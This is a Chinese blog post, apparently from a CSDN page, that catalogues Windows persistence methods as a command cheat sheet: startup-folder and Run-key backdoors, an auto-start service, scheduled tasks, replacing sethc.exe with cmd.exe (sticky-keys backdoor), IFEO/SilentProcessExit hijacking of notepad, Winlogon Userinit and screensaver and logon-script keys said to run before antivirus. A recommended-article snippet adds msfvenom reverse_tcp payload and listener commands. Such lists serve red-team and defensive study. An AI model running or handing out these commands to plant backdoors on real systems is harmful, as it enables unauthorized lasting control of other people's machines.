全网最全权限维持方式汇总

全网最全权限维持方式汇总
最新推荐文章于 2025-09-15 13:27:11 发布
原创 最新推荐文章于 2025-09-15 13:27:11 发布 · 179 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#权限维持 #网络安全 #内网安全 #运维

自启动加载后门执行

shell:startup      //用户自启动加载后门执行
C:\Users\zxy52\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

shell:common startup   //系统自启动加载后门执行
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

自启动服务加载后门执行

sc create ServiceTest binPath=C:\shell.exe start=auto   //auto是自启动服务加载
sc delete ServiceTest    //删除服务

自启动注册表加载后门执行

当前用户键值
计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

服务器键值(需要管理员权限)
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

添加启动项
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"  /V  "backdoor" /t REG_SZ /F /D "C:\shell.exe"   //当前用户添加自启动 
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"  /V  "backdoor" /t REG_SZ /F /D "C:\shell.exe"    //服务器用户添加自启动

/V后是名字
/t后是类型
/F后是执行的程序

计划计时任务加载后门执行

schtasks /create /tn "RunXD" /tr "C:\xd.exe" /sc daily  /st 12:50    //每天12:50执行计划任务
schtasks /delete /tn "RunXD" /f       //删除计划任务
schtasks     //查看计划任务

组策略bat脚本运行加载

1.创建一个启动某个程序的bat文件
2.在本地组策略编辑器中设置注销或者登录时触发

粘贴键后门

sethc.exe   
takeown /f c:\Windows\System32\sethc.exe   //修改权限,这条就是解锁权限
move sethc.exe seth1.exe   //移动备份,就是重命名备份
copy cmd.exe sethc.exe     //替换劫持,这样子按5次shift就会开启cmd了

映像劫持权限维持技术

//运行notepad会运行shell.exe这个后门
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "c:\shell.exe" 

WinLogon配合无文件落地上线

切换用户登录或远程终端登录出发
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:\shell.exe,"

屏幕保护生效后执行

reg add "计算机\HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f

Logon Scripts登录脚本后门

Windows用户登录时触发,Logon Scripts能够优先于杀毒软件执行,绕过杀毒
reg add "计算机\HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\shell.exe"
xing.yu.CTF
关注
【华为OD机考真题】- 按身高和体重排队(B卷-100分)(JS版)
**My Coding Family**
05-08 1590
🔔本文收录于「最新最全华为OD机试真题(JavaScript版)」专栏,手把手带你零基础教学华为OD机试。本题集提供最优题解思路,解题步骤,代码解析,复杂度分析及最优题解源码等,支持多语言题解,助你轻松拿捏OD机考,一举上岸!安利大家关注&&收藏&&订阅!题库正在疯狂收录中,up!up!up!! 🚫提醒:拒绝一切代考/替考,违法必究!专栏所写题库均精心搜集于互联网,经过精心筛选和整理,结合数位十多年大厂实战经验资深大佬经验所撰,欢迎订阅。    💗订阅福利:一次订阅,可永久免费阅读,提供在线答疑解惑,
【华为OD机考真题】- 按身高和体重排队(B卷-100分)(C版)
**My Coding Family**
05-12 890
🔔本文收录于「最新最全华为OD机试真题(C版)」专栏,手把手带你零基础教学华为OD机试。本题集提供最优题解思路,解题步骤,代码解析,复杂度分析及最优题解源码等,支持多语言题解,助你轻松拿捏OD机考,一举上岸!安利大家关注&&收藏&&订阅!题库正在疯狂收录中,up!up!up!! 🚫提醒:拒绝一切代考/替考,违法必究!专栏所写题库均精心搜集于互联网,经过精心筛选和整理,结合数位十多年大厂实战经验资深大佬经验所撰,欢迎订阅。    💗订阅福利:一次订阅,可永久免费阅读,提供在线答疑解惑,后续题库更新皆可阅
权限维持简单总结
Aiwin的博客
08-17 5095
权限维持简单总结
2023史上最全Windows常见的几种权限维持
zkaqlaoniao的博客
11-20 1175
映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助机制等。
内网安全权限维持的各种姿势
8888的博客
07-12 2776
监听:msfconsole -x "use exploit/multi/handler;MSF后门和监听:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9997 -f exe -o update.exe。MSF后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.128 LPORT=9999 -f exe -o kms.exe。
网络安全权限维持那点事
ytdd66的博客
04-09 3361
后台权限(Back-end Permissions):后台权限通常指的是系统或应用程序的管理后台权限,允许用户对系统进行管理和配置。拥有后台权限的用户可以访问系统的管理界面,并进行用户管理、内容管理、配置设置等操作。这些权限通常由管理员或具有特定权限的用户持有。网站权限(Website Permissions):网站权限指的是用户在网站上的操作和访问权限。这包括用户对网站内容的访问权限、发布内容的权限、评论权限等。不同用户可能具有不同级别的网站权限,例如普通用户、编辑、管理员等。
Windows常见的几种权限维持
hackzkaq的博客
05-24 1820
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
147.【2024Java八股-全网最全-10w字】
qq_69683957的博客
04-03 1590
eg: 学校、院校、经验、年龄、跳槽频率…基本包括16种常见使用场景: 、数据共享分布式、、全局 ID、计数器、限流、位统计、购物车、用户消息时间线 timeline、、抽奖、点赞、签到、打卡、商品标签、商品筛选、用户关注、推荐模型、排行榜.详细讲解16种使用场景: https://blog.csdn.net/zxl646801924/article/details/123202381用户使用id进行查询文章的时候,首先会查询redis数据库,如果在redis中命中数据,那么redis就向用户返回查询的结果
要看就看最好,16万字全网最硬核redis总结,谁赞成,谁反对?(被粉丝疯狂催更,已有人反馈看完专栏拿到大厂offer!!!)
Java框架、并发编程、分布式、微服务、Redis、HarmonyOS、中间件等技术
10-10 1万+
被粉丝疯狂催更,已有人反馈看完专栏拿到大厂offer,非常适合应届毕业生和初中级工程师!!!
护网面试题汇总全网最详细!
最新发布
hackers110的博客
09-15 990
护网面试重点知识摘要: 基础漏洞:包括端口服务漏洞(FTP匿名访问、SSH弱口令等)、数据库漏洞(MySQL/Oracle弱口令)、Web中间件漏洞(Tomcat/JBoss)、服务器漏洞(IIS/Nginx)。 应急响应流程:准备工具→判断事件类型→抑制影响→封堵攻击源→恢复业务→监控改进。 Java反序列化漏洞:利用工具生成Payload执行代码或命令,常用于写Webshell。 UDF提权:通过MySQL自定义函数提权,需满足系统条件及权限要求。 Webshell获取与提权:可通过MSSQL、FTP溢
渗透之权限维持的13种方法
include_voidmain的博客
08-04 1278
渗透之权限维持的13种方法
Windows权限维持技术总结、复现
leah126的博客
03-13 1226
的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。例如,要在 Windows 资源管理器用户界面启动之前运行某个程序,可以将该程序的名称替换为该条目的值中的 Userinit.exe,然后在该程序中包含启动 Userinit.exe 的指令。在 Windows 上有一个重要的机制,也就是服务。
权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon
今天是几号的博客
04-15 1288
配合powershell payload(需免杀)实现无文件落地。系统自带的辅助功能进行替换执行,放大镜,旁白,屏幕键盘等均可。1、WinLogon配合无文件落地上线(切换用户登录就会上线)远程连接时,连按五下shift键可以打开粘滞键。将后门放置该目录,服务器重启即上线。测试:执行notepad成cmd。-服务器键值(需要管理员权限)2、屏幕保护生效后执行后门。3、自启动注册表加载。
权限维持-域环境&单机版---粘滞键&屏保&登录
金灰的博客
06-29 592
免责声明;本文仅做技术交流与学习,,,
Windows10/linux权限维持
m0_74891800的博客
02-06 1193
1选项表示使用MD5加密算法,-salt 'salt'为密码添加一个盐值(一个随机字符串),123456是你要设置的明文密码。这个命令将返回加密后的密码。然后在在文件里面创建一个建建名 随便填写 我这里使用的是Debugger 然后在下面添加他的值他的值为你想要执行的文件的绝对路径,就例如;1,/var/spool/cron/ 目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。d /home/test: 这个选项设置新用户的家目录为/home/test。
Windows的权限管理方式
m0_73889578的博客
05-18 1297
可以通过设置权限级别来限制某个用户或组的范围内可执行的操作。1. 用户账户控制(UAC)- 用户账户控制允许管理员以标准用户身份运行,当执行需要管理员权限的任务时,会提示输入管理员密码进行确认。它用于确定哪些用户/组具有访问该对象的权限,并指定何种操作(读取、写入、删除等)这些用户/组可以执行。2. 组策略 - 组策略可以对一组计算机或用户应用统一的政策,例如用户访问的网络共享和应用程序的安装和配置。5. 用户账户 - Windows在每个用户登录时会创建一个用户账户,包括基本的权限分配。
常见系统权限维持的方法
weixin_62369433的博客
04-09 522
权限维持是黑客攻击中的一个重要环节,如果攻击者获得了系统管理员权限,就能够完全控制系统,进行各种恶意操作。
Linux下常见权限维持方式
热门推荐
03-06 2万+
攻击者在获取系统权限后,通常会留下后门以便再次访问。本文将对Linux下常见权限维持技术进行解析,知己知彼百战不殆。相关文章:Linux下的几种隐藏技术1、一句话添加用户和密码添加普...
Linux 权限维持手法
qq_53742230的博客
07-21 2867
Linux 权限维持手法
词典刺客:全网最全英汉词典整合收录
资源摘要信息:"最全词典整合收录(词典刺客)" 该资源标题"最全词典整合收录(词典刺客)"指的是一个集合了多种英语词典的大型电子词典数据库。它包含了以下具体词典内容: - 柯林斯双解词典(Collins English ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值